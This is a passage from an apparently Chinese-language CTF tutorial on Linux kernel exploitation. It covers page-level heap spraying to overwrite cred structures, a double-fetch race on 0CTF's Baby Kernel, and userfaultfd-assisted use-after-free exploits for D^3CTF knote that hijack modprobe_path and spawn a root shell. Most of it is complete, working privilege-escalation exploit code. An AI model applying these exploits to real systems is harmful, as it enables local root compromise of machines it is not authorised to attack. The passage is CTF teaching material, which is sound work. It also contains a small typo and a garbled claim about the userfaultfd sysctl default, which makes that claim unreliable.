    __asm__ volatile (
            " mov r15, rsi; "   /* save the rsi*/
            " xor esi, esi; "   /* set esp and useless args to NULL */
            " xor edx, edx; "
            " xor r10d, r10d; "
            " xor r8d, r8d;   "
            " xor r9d, r9d;   "
            " mov eax, 56;  "   /* __NR_clone */
            " syscall;      "
            " cmp eax, 0;   "
            " je child_fn;  "
            " ret;          "   /* parent */
            "child_fn:      "
            " jmp r15;      "   /* child */
            );
}

释放另一半内存页，在 castaway_cache 上堆喷，让其取走这些内存页，并且对每个申请的 object 溢出试图跨页溢出修改 cred 。

/* free pages for our vulerable objects */
puts("[*] freeing for vulnerable pages...");
for (int i = 0; i < PGV_PAGE_NUM; i += 2) {
    free_page(i);
}

/* spray vulnerable objects, hope that we can make an oob-write to cred */
puts("[*] trigerring vulnerability in castaway kernel module...");
memset(buf, 0, sizeof(buf));
*(uint32_t *) &buf[VUL_OBJ_SIZE - 6] = 1;    /* cred->usage */
for (int i = 0; i < VUL_OBJ_NUM; i++) {
    alloc();
    edit(i, VUL_OBJ_SIZE, buf);
}

最后解除 waiting_for_root_fn 的阻塞，使其检查进程权限。如果进程被提权置 root 则返回 shell 。

1
2
3

/* checking privilege in child processes */
puts("[*] notifying child processes and waiting...");
write(check_root_pipe[1], buf, CRED_SPRAY_NUM);

本题借助 setsockopt() 完成页级堆风水，相关原理在 kernel pwn 常用结构体总结中进行介绍。

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>
#include <string.h>
#include <sched.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>

#define PGV_CRED_START (PGV_PAGE_NUM / 2)
#define CRED_SPRAY_NUM 514
#define VUL_OBJ_NUM 400
#define VUL_OBJ_SIZE 512
#define VUL_OBJ_PER_SLUB 8
#define VUL_OBJ_SLUB_NUM (VUL_OBJ_NUM / VUL_OBJ_PER_SLUB)

struct castaway_request {
    int64_t index;
    size_t size;
    void *buf;
};

int dev_fd;

void err_exit(char *msg) {
    printf("\033[31m\033[1m[x] Error: %s\033[0m\n", msg);
    exit(EXIT_FAILURE);
}

void alloc(void) {
    ioctl(dev_fd, 0xCAFEBABE);
}

void edit(int64_t index, size_t size, void *buf) {
    struct castaway_request r = {
            .index = index,
            .size = size,
            .buf = buf
    };
    ioctl(dev_fd, 0xF00DBABE, &r);
}

char child_pipe_buf[1];
int check_root_pipe[2];
char bin_sh_str[] = "/bin/sh";
char *shell_args[] = {bin_sh_str, NULL};
struct timespec timer = {
        .tv_sec = 100000000,
        .tv_nsec = 0,
};

int waiting_for_root_fn(void *args) {
    /* we're using the same stack for them, so we need to avoid cracking it.. */
    __asm__ volatile (
            "   lea rax, [check_root_pipe]; "
            "   mov edi, dword ptr [rax]; "
            "   mov rsi, child_pipe_buf; "
            "   mov edx, 1;   "
            "   xor eax, eax; " /* read(check_root_pipe[0], child_pipe_buf, 1)*/
            "   syscall;      "
            "   mov eax, 102; " /* getuid() */
            "   syscall; "
            "   cmp eax, 0; "
            "   jne failed; "
            "   lea rdi, [bin_sh_str];  "
            "   lea rsi, [shell_args];  "
            "   xor edx, edx;   "
            "   mov eax, 59;    "
            "   syscall;        "   /* execve("/bin/sh", args, NULL) */
            "failed: "
            "   lea rdi, [timer]; "
            "   xor esi, esi; "
            "   mov eax, 35; "  /* nanosleep() */
            "   syscall; "
            );

    return 0;
}

__attribute__((naked)) long simple_clone(int flags, int (*fn)(void *)) {
    /* for syscall, it's clone(flags, stack, ...) */
    __asm__ volatile (
            " mov r15, rsi; "   /* save the rsi*/
            " xor esi, esi; "   /* set esp and useless args to NULL */
            " xor edx, edx; "
            " xor r10d, r10d; "
            " xor r8d, r8d;   "
            " xor r9d, r9d;   "
            " mov eax, 56;  "   /* __NR_clone */
            " syscall;      "
            " cmp eax, 0;   "
            " je child_fn;  "
            " ret;          "   /* parent */
            "child_fn:      "
            " jmp r15;      "   /* child */
            );
}

/**
 * @brief create an isolate namespace
 * note that the caller **SHOULD NOT** be used to get the root, but an operator
 * to perform basic exploiting operations in it only
 */
void unshare_setup(void) {
    char edit[0x100];
    int tmp_fd;

    unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    write(tmp_fd, "deny", strlen("deny"));
    close(tmp_fd);

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getuid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getgid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);
}

#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

struct tpacket_req {
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
};

/* each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
    int idx;
    int cmd;
    unsigned int size;
    unsigned int nr;
};

/* operations type */
enum {
    CMD_ALLOC_PAGE,
    CMD_FREE_PAGE,
    CMD_EXIT,
};

/* tpacket version for setsockopt */
enum tpacket_versions {
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr) {
    struct tpacket_req req;
    int socket_fd, version;
    int ret;

    socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
        ret = socket_fd;
        goto err_out;
    }

    version = TPACKET_V1;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
                     &version, sizeof(version));
    if (ret < 0) {
        printf("[x] failed at setsockopt(PACKET_VERSION)\n");
        goto err_setsockopt;
    }

    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;
    req.tp_block_nr = nr;
    req.tp_frame_size = 0x1000;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
        goto err_setsockopt;
    }

    return socket_fd;

    err_setsockopt:
    close(socket_fd);
    err_out:
    return ret;
}

/* the parent process should call it to send command of allocation to child */
int alloc_page(int idx, unsigned int size, unsigned int nr) {
    struct pgv_page_request req = {
            .idx = idx,
            .cmd = CMD_ALLOC_PAGE,
            .size = size,
            .nr = nr,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

/* the parent process should call it to send command of freeing to child */
int free_page(int idx) {
    struct pgv_page_request req = {
            .idx = idx,
            .cmd = CMD_FREE_PAGE,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(req));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

/* the child, handler for commands from the pipe */
void spray_cmd_handler(void) {
    struct pgv_page_request req;
    int socket_fd[PGV_PAGE_NUM];
    int ret;

    /* create an isolate namespace*/
    unshare_setup();

    /* handler request */
    do {
        read(cmd_pipe_req[0], &req, sizeof(req));

        if (req.cmd == CMD_ALLOC_PAGE) {
            ret = create_socket_and_alloc_pages(req.size, req.nr);
            socket_fd[req.idx] = ret;
        } else if (req.cmd == CMD_FREE_PAGE) {
            ret = close(socket_fd[req.idx]);
        } else {
            printf("[x] invalid request: %d\n", req.cmd);
        }

        write(cmd_pipe_reply[1], &ret, sizeof(ret));
    } while (req.cmd != CMD_EXIT);
}

/* init pgv-exploit subsystem :) */
void prepare_pgv_system(void) {
    /* pipe for pgv */
    pipe(cmd_pipe_req);
    pipe(cmd_pipe_reply);

    /* child process for pages spray */
    if (!fork()) {
        spray_cmd_handler();
    }
}

void bind_core(int core) {
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

int main() {
    char buf[0x1000];

    bind_core(0);

    dev_fd = open("/dev/castaway", O_RDWR);
    if (dev_fd < 0) {
        err_exit("FAILED to open castaway device!");
    }

    prepare_pgv_system();

    /* make buddy's lower order clean, castaway_requesting from higher */
    puts("[*] spraying pgv pages...");
    for (int i = 0; i < PGV_PAGE_NUM; i++) {
        if (alloc_page(i, getpagesize(), 1) < 0) {
            printf("[x] failed at no.%d socket\n", i);
            err_exit("FAILED to spray pages via socket!");
        }
    }

    /* free pages for cred */
    puts("[*] freeing for cred pages...");
    for (int i = 1; i < PGV_PAGE_NUM; i += 2) {
        free_page(i);
    }

    /* spray cred to get the isolate pages we released before */
    puts("[*] spraying cred...");
    pipe(check_root_pipe);
    for (int i = 0; i < CRED_SPRAY_NUM; i++) {
        if (simple_clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND, waiting_for_root_fn) < 0) {
            printf("[x] failed at cloning %d child\n", i);
            err_exit("FAILED to clone()!");
        }
    }

    /* free pages for our vulerable objects */
    puts("[*] freeing for vulnerable pages...");
    for (int i = 0; i < PGV_PAGE_NUM; i += 2) {
        free_page(i);
    }

    /* spray vulnerable objects, hope that we can make an oob-write to cred */
    puts("[*] trigerring vulnerability in castaway kernel module...");
    memset(buf, 0, sizeof(buf));
    *(uint32_t *) &buf[VUL_OBJ_SIZE - 6] = 1;    /* cred->usage */
    for (int i = 0; i < VUL_OBJ_NUM; i++) {
        alloc();
        edit(i, VUL_OBJ_SIZE, buf);
    }

    /* checking privilege in child processes */
    puts("[*] notifying child processes and waiting...");
    write(check_root_pipe[1], buf, CRED_SPRAY_NUM);

    sleep(100000000);
    return 0;
}

Race condition

double fetch

用户空间向内核传递数据时，内核先通过通过 copy_from_user 等拷贝函数将用户数据拷贝至内核空间进行校验及相关处理，但在输入数据较为复杂时，内核可能只引用其指针，而将数据暂时保存在用户空间进行后续处理。此时，该数据存在被其他恶意线程篡改风险，造成内核验证通过数据与实际使用数据不一致，导致内核代码执行异常。
一个典型的 Double Fetch 漏洞原理如下图所示，一个用户态线程准备数据并通过系统调用进入内核，该数据在内核中有两次被取用，内核第一次取用数据进行安全检查（如缓冲区大小、指针可用性等），当检查通过后内核第二次取用数据进行实际处理。而在两次取用数据之间，另一个用户态线程可创造条件竞争，对已通过检查的用户态数据进行篡改，在真实使用时造成访问越界或缓冲区溢出，最终导致内核崩溃或权限提升。

例题：2018 0CTF Finals Baby Kernel

附件下载链接
baby_ioctl 函数有两个功能。

0x6666：打印 flag 的存放地址

if ( request == 0x6666 )
{
  printk("Your flag is at %px! But I don't think you know it's content\n", flag);
  return 0LL;
}

0x1337：检验用户输入的参数地址是否合法以及用户输入的 flag 内容是否正确。如果通过检验则打印 flag 内容。

bool __fastcall _chk_range_not_ok(void *ptr, __int64 size, void *user_space)
{
  bool carry_flag; // cf
  void *buf_end; // rdi

  carry_flag = __CFADD__(size, ptr);
  buf_end = (char *)ptr + size;
  return carry_flag || user_space < buf_end;
}

  else if ( request == 0x1337
         && !_chk_range_not_ok(input, sizeof(Input), *(void **)(__readgsqword((unsigned int)&current_task) + 0x1358))
         && !_chk_range_not_ok(input->flag, input->len, *(void **)(__readgsqword((unsigned int)&current_task) + 0x1358))
         && input->len == strlen(flag) )
  {
    for ( i = 0; i < strlen(flag); ++i )
    {
      if ( input->flag[i] != flag[i] )
        return 22LL;
    }
    printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag);
    return 0LL;
  }

调试发现第一次 _chk_range_not_ok 检查结构体范围是否在用户空间。
第二次 _chk_range_not_ok 检查 flag 是否在用户空间。
因此我们可以起一个线程改 flag 指针，可以有一定概率在第二次 _chk_range_not_ok 和校验 flag 之间将 flag 指针指向真正的 flag 从而通过对 flag 的校验。

#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define TRYTIME 0x1000
#define LEN 0x1000

struct attr {
    char *flag;
    size_t len;
};
char *addr;
int finish = 0;
char buf[LEN + 1];

void change_attr_value(void *s) {
    struct attr *s1 = s;
    while (finish == 0) {
        s1->flag = addr;
    }
}

int main(void) {
    int addr_fd;
    char *idx;
    int fd = open("/dev/baby", 0);
    ioctl(fd, 0x6666);
    system("dmesg > /tmp/record.txt");
    addr_fd = open("/tmp/record.txt", O_RDONLY);
    lseek(addr_fd, -LEN, SEEK_END);
    read(addr_fd, buf, LEN);
    close(addr_fd);
    idx = strstr(buf, "Your flag is at ");
    if (idx == 0) {
        printf("[-] Not found addr");
        exit(-1);
    } else {
        idx += 16;
        addr = (char *) strtoull(idx, NULL, 16);
        printf("[+] flag addr: %p\n", addr);
    }
    pthread_t t1;
    struct attr t = {"flag{fake_flag}", 33};
    pthread_create(&t1, NULL, (void *) change_attr_value, &t);
    for (int i = 0; i < TRYTIME; i++) {
        t.flag = "flag{fake_flag}";
        ioctl(fd, 0x1337, &t);
    }
    finish = 1;
    pthread_join(t1, NULL);
    close(fd);
    puts("[+]result is :");
    system("dmesg | grep flag{");
    return 0;
}

userfaultfd

条件竞争的成功利用往往需要正确的顺序，然而若是直接开两个线程进行竞争，命中的几率是比较低的，就比如说前面的 double fetch 尝试 0x1000 次也不一定会命中一次。而 userfaultfd 本身只是一个常规的与处理缺页异常相关的系统调用，但是通过这个机制我们可以控制进程执行流程的先后顺序，从而使得对条件竞争的利用成功率大幅提高。

内核的内存主要有两个区域，RAM和交换区，将要被使用的内存放在RAM，暂时用不到的内存放在交换区，内核控制交换进出的过程。RAM中的地址是物理地址，内核使用虚拟地址，其通过多级页表建立虚拟地址到物理地址的映射。但有的内存既不在RAM又不在交换区，比如mmap出来的内存，这块内存在读写它之前并没有分配实际的物理页。例如：

1	mmap(0x1337000, 0x1000, PROT_READ \| PROT_WRITE, MAP_FIXED \| MAP_PRIVATE, fd, 0);

内核并未将fd内容拷贝到0x1337000，只是将地址0x1337000映射到文件fd。
比如此时有下列代码运行

1	char c = (char ) 0x1337000;

可以看到在读取数据，但是在实际读取中由于没有为 0x2337000 分配物理页会触发缺页异常，此时内核会进行以下操作：

为 0x1337000 创建物理帧
从 fd 读取内容到 0x1337000（如果是堆空间映射的话，会将对应的物理帧清零）
在页表中创建虚拟地址 0x1337000 到物理地址之间的映射。

userfaultfd 是 linux 下的一种缺页处理机制，该处理机制可以让用户自定义函数来处理缺页异常。下面举一个向缺页处写入数据的例子：

#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

int page_size;

static void *fault_handler_thread(void *arg) {
    long uffd = (long) arg;

    //mmap 映射一块虚拟内存用来存放待写入的数据
    static char *page = NULL;
    if (page == NULL) {
        page = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (page == MAP_FAILED) {
            puts("[-] Error at: mmap");
            exit(-1);
        }
        printf("[*] mmap addr: %p\n", page);
    }

    //循环处理缺页错误
    while (true) {
        //poll 函数等待 userfaultfd 的事件
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }

        //poll 函数返回的结果
        puts("\nfault_handler_thread():");
        printf("    poll() returns: nready = %d; POLLIN = %d; POLLERR = %d\n",
               nready, (pollfd.revents & POLLIN) != 0, (pollfd.revents & POLLERR) != 0);

        //从 userfaultfd 读取事件
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }

        //userfaultfd 的事件应当是缺页错误事件
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        //userfaultfd 返回的缺页错误相关信息
        printf("    UFFD_EVENT_PAGEFAULT event: ");
        printf("flags = 0x%llx; ", msg.arg.pagefault.flags);
        printf("address = 0x%llx\n", msg.arg.pagefault.address);

        //用户自定义的处理缺页错误的部分
        static int fault_cnt = 0;
        memset(page, 'A' + fault_cnt % 20, page_size);
        fault_cnt++;

        //将内容复制到目标位置，注意页对齐
        struct uffdio_copy uffdio_copy;
        uffdio_copy.src = (unsigned long) page;
        uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(page_size - 1);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
        printf("        (uffdio_copy.copy returned %lld)\n", uffdio_copy.copy);
    }
}

int main() {
    //获取内存页长度
    page_size = (int) sysconf(_SC_PAGE_SIZE);

    printf("[*] page size: 0x%x\n", page_size);

    //系统调用创建 userfaultfd
    long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) {
        puts("Error at: userfaultfd");
        exit(-1);
    }

    //设置 userfaultfd 调用接口
    struct uffdio_api uffdio_api;
    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    if (ioctl((int) uffd, UFFDIO_API, &uffdio_api) == -1) {
        puts("Error at: ioctl-UFFDIO_API");
        exit(-1);
    }

    //mmap 映射一块虚拟内存
    char *addr = (char *) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (addr == MAP_FAILED) {
        puts("Error at: mmap");
        exit(-1);
    }

    printf("[*] mmap addr: 0x%lx\n", (size_t) addr);

    //在创建的 userfaultfd 上注册一块内存，注册的内存区域覆盖刚才 mmap 映射的虚拟内存
    struct uffdio_register uffdio_register;
    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = page_size;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl((int) uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
        puts("Error at: ioctl-UFFDIO_REGISTER");
        exit(-1);
    }

    //创建一个线程处理注册的内存区域发生的缺页中断
    pthread_t thr;
    int s = pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);
    if (s != 0) {
        puts("Error at: pthread_create");
        exit(-1);
    }

    //访问 mmap 映射的虚拟内存触发缺页中断
    size_t ptr = *(unsigned long long *) addr;
    printf("[*] Get data: 0x%lx\n", ptr);

    return 0;
}

运行结果如图，自定义的缺页处理函数向缺页处写入了数据。
需要说明的是，自从 5.11 版本起内核 fs/userfaultfd.c 中全局变量 sysctl_unprivileged_userfaultfd 初始化为 1，这意味着只有 root 权限用户才能使用 userfaultfd 。

不过还有用户空间文件系统（filesystem in userspace，FUSE）可以被用作 userfaultfd 的替代品，帮助我们完成条件竞争的利用。只不过这种方式对环境要求较高，CTF 题目中的环境通常不支持这种利用方式。

例题：D^3CTF2019 - knote

附件下载链接
有 add，dele，edit，get 4种功能，ioctl 不能调用超过 9 次。其中 edit 和 get 没有加锁。
首先是内核地址泄露。利用 userfaultfd 制造将获取数据的内存块替换成 tty_struct，然后从其中的数据获取内核基地址。

第二次同理，利用 userfaultfd 构造 UAF 劫持 freelist 修改 modprobe_path 使得修改 flag 文件权限的 shell 脚本以管理员权限执行。

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

const int TTY_STRUCT_SIZE = 0x2C0;
const size_t DO_SAK_WORK = 0xffffffff815d4ef0;
const size_t MODPROBE_PATH = 0xffffffff8245c5c0;

void bind_core(int core) {
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

void qword_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

bool is_kernel_text_addr(size_t addr) {
    return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFFFEFFFFFF;
//    return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFF9FFFFFFF;
}

char *page;
long page_size;

void *fault_handler_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        sleep(4);
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }
        struct uffdio_copy uffdio_copy;
        uffdio_copy.src = (unsigned long) page;
        uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(page_size - 1);
        printf("[*] uffdio_copy.dst: %p\n", uffdio_copy.dst);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
        return NULL;
    }
}

void register_userfaultfd(void *addr, size_t len, void *(*handler)(void *)) {
    long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) {
        puts("[-] Error at: userfaultfd");
        exit(-1);
    }
    struct uffdio_api uffdio_api = {.api=UFFD_API, .features=0};
    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_API");
        exit(-1);
    }
    struct uffdio_register uffdio_register;
    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_REGISTER");
        exit(-1);
    }
    static pthread_t monitor_thread;
    if (pthread_create(&monitor_thread, NULL, handler, (void *) uffd) != 0) {
        puts("[-] Error at: pthread_create");
        exit(-1);
    }
}

typedef struct {
    union {
        size_t size;
        size_t index;
    };
    char *buf;
} Chunk;
long knote_fd;

void chunk_add(size_t size) {
    Chunk chunk = {.size=size};
    ioctl((int) knote_fd, 0x1337, &chunk);
}

void chunk_edit(size_t index, char *buf) {
    Chunk chunk = {.index=index, .buf=buf};
    ioctl((int) knote_fd, 0x8888, &chunk);
}

void chunk_get(size_t index, char *buf) {
    Chunk chunk = {.index=index, .buf=buf};
    ioctl((int) knote_fd, 0x2333, &chunk);
}

void chunk_del(size_t index) {
    Chunk chunk = {.index=index};
    ioctl((int) knote_fd, 0x6666, &chunk);
}

int main() {
    bind_core(0);
    page_size = getpagesize();
    char *buf1 = (char *) mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    char *buf2 = (char *) mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    register_userfaultfd(buf1, 0x1000, (void *) fault_handler_thread);
    register_userfaultfd(buf2, 0x1000, (void *) fault_handler_thread);
    page = malloc(0x1000);
    void *kernel_base = (void *) 0xffffffff81000000;
    size_t kernel_offset = 0;
    FILE *addr_fp = fopen("/addr.txt", "r");
    knote_fd = open("/dev/knote", O_RDWR);
    if (addr_fp != NULL) {
        fscanf(addr_fp, "%llx %llx", &kernel_base, &kernel_offset);
        fclose(addr_fp);
    } else {
        chunk_add(TTY_STRUCT_SIZE);
        pid_t pid = fork();
        if (pid < 0) {
            puts("[-] FAILED to fork the child");
            exit(-1);
        } else if (pid == 0) {
            puts("[*] Child process sleeping now...");
            sleep(1);
            puts("[*] Child process started.");
            chunk_del(0);
            sleep(1);
            open("/dev/ptmx", O_RDWR);
            puts("[*] Object free and tty got open. Backing parent thread...");
            exit(0);
        } else {
            puts("[*] Parent process trapped in userfaultfd...");
            chunk_get(0, buf1);
            puts("[*] tty struct data obtained");
        }
        qword_dump("leak tty_struct", buf1, TTY_STRUCT_SIZE);
        if (is_kernel_text_addr(((size_t *) buf1)[86])) {
            puts("[+] Successfully hit the tty_struct.");
            kernel_offset = ((size_t *) buf1)[86] - DO_SAK_WORK;
            kernel_base = (void *) ((size_t) kernel_base + kernel_offset);
        } else {
            puts("[-] Failed to hit the tty struct.");
            exit(-1);
        }
        addr_fp = fopen("/addr.txt", "w");
        fprintf(addr_fp, "%llx %llx", kernel_base, kernel_offset);
        fclose(addr_fp);
    }

    size_t modprobe_path = MODPROBE_PATH + kernel_offset;
    printf("[*] Kernel offset: %p\n", kernel_offset);
    printf("[*] Kernel base: %p\n", kernel_base);
    printf("[*] modprobe_path: %p\n", modprobe_path);
    if (open("/shell.sh", O_RDWR) < 0) {
        system("echo '#!/bin/sh' >> /shell.sh");
        system("echo 'chmod 777 /flag' >> /shell.sh");
        system("chmod +x /shell.sh");
    }
    chunk_add(0x100);
    memcpy(page, &modprobe_path, 8);
    pid_t pid = fork();
    if (pid < 0) {
        puts("[-] FAILED to fork the child");
        exit(-1);
    } else if (pid == 0) {
        puts("[*] Child process sleeping now...");
        sleep(1);
        puts("[*] Child process started.");
        chunk_del(0);
        puts("[*] UAF constructed");
        exit(0);
    } else {
        puts("[*] Parent process trapped in userfaultfd...");
        chunk_edit(0, buf2);
        puts("[*] Hijack finished");
    }
    chunk_add(0x100);
    chunk_add(0x100);
    chunk_edit(1, "/shell.sh");
    system("echo -e '\\xff\\xff\\xff\\xff' > /fake");
    system("chmod +x /fake");
    system("/fake");
    if (open("/flag", O_RDWR) < 0) {
        puts("FAILED to hijack!");
        exit(-1);
    }
    puts("[+] hijack success");
    system("/bin/sh");
    return 0;
}

上面这种方法构造 Race condition 需要 sleep 效率较低，即使保存泄露的基址避免重复爆破依然需要长时间爆破。
不难想到，可以将子线程的逻辑写到 userfaule_fd 的处理函数中，因为页错误发生和处理页错误的顺序是确定的，因此保证了 Race condition 的顺序。这样就可以避免通过 sleep 时长来控制先后顺序。

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

const int TTY_STRUCT_SIZE = 0x2C0;
size_t modprobe_path = 0xffffffff8245c5c0;

void qword_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

bool is_kernel_text_addr(size_t addr) {
    return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFFFEFFFFFF;
//    return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFF9FFFFFFF;
}

void bind_core(int core) {
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

char *page;
long page_size;

void register_userfaultfd(void *addr, size_t len, void *(*handler)(void *)) {
    long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) {
        puts("[-] Error at: userfaultfd");
        exit(-1);
    }
    struct uffdio_api uffdio_api = {.api=UFFD_API, .features=0};
    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_API");
        exit(-1);
    }
    struct uffdio_register uffdio_register;
    uffdio_register.range.start = (unsigned long) addr;
